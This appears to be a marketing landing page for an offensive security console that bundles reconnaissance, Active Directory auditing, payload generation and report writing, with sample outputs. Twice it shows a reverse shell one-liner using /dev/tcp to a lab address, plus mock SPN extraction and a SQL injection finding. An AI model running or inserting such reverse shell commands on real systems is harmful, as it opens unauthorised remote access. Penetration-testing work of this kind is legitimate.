Offensive security toolkit, unified.

OffSec Labs hosts critical security apps—including reconnaissance suites, AD auditors, and report builders—unified under a single login. Execute actions, audit infrastructures, and generate reports from one calm, powerful console.

Modular apps, one workspace

Enable what you need, leave out what you don't. All tools hook into your account under a single credentials database.

Reconnaissance Suite

Automate passive subdomain enumeration, DNS mappings, port discovery, and host cataloging.

Active: api.offsec.local
Discovered: dev.offsec.local, test-dc.local
Flagged: admin.offsec.local

Security Reporting

Compile professional pentesting reports using templated layouts and nested CVSS score calculators.

AD Auditor

Audit Windows domains, user delegations, and check for Kerberoasting susceptibility.

Payload Console

Generate and deliver payloads with customizable callback architectures.

Exploit Research

Validate service vulnerabilities and analyze package security vectors.

Liblzma Backdoor FAIL
Log4j Injection OK
SSH Bruteforce OK

Exploit Database

Quick access to validated proofs-of-concept for common CVE mappings.

CVE-2024-3094 CVE-2021-44228 CVE-2023-3519

Sentinel Detections

Deploy corresponding SIEM detection rules alongside offensive playbooks.

Sysmon Process Creation
LDAP Queries Logged
RDP Pipe Access

Interactive Lab Shells

Connect directly to terminal shells inside our sandboxed simulation domains.

sh -i >& /dev/tcp/10.10.14.2/4444

Technical depth

App Console Modules

Recon Tool

Subdomain & service mapping.

Perform automated recon sweeps, resolve hosts, run passive DNS queries, and detect open ports across entire organizations.

OffSec Reporting

Templated report builder.

Write markdown security advisories, calculate CVSS vectors dynamically, and export clean, executive-ready PDF findings.

AD Auditor

Domain path auditing.

Audit Kerberos settings, extract service accounts (SPNs), track group memberships, and visualize domain trust paths.

Payload Console

Interactive shellcode builders.

Generate customized binary payloads, MSFvenom setups, web shells, and configure multi-handling listeners.

🔍 Recon Sweep Console (Status: idle)
# Resolved Subdomains:
- [OK] dc01.offsec.local (10.10.11.1)
- [OK] portal.offsec.local (10.10.11.2)
- [OK] git.offsec.local (10.10.11.45)

📝 Report Draft #42 (CVSS 9.8)
Unauthenticated SQL Injection in Portal

The 'id' parameter in /api/profile is built into the SQL query by raw string concatenation, permitting administrative user bypass.

Impact: Administrative Account Takeover / RCE

# Extracting SPNs...
sql_service@offsec.local -> MSSQLSvc/db01:1433
http_app@offsec.local -> HTTP/portal.offsec.local

[!] sql_service SPN has weak RC4 encryption.

# Generated reverse shell code:
sh -i >& /dev/tcp/10.10.14.2/9001 0>&1

Ready to consolidate your security tools?

Join other security operators using our modular console as a single, consolidated launchpad.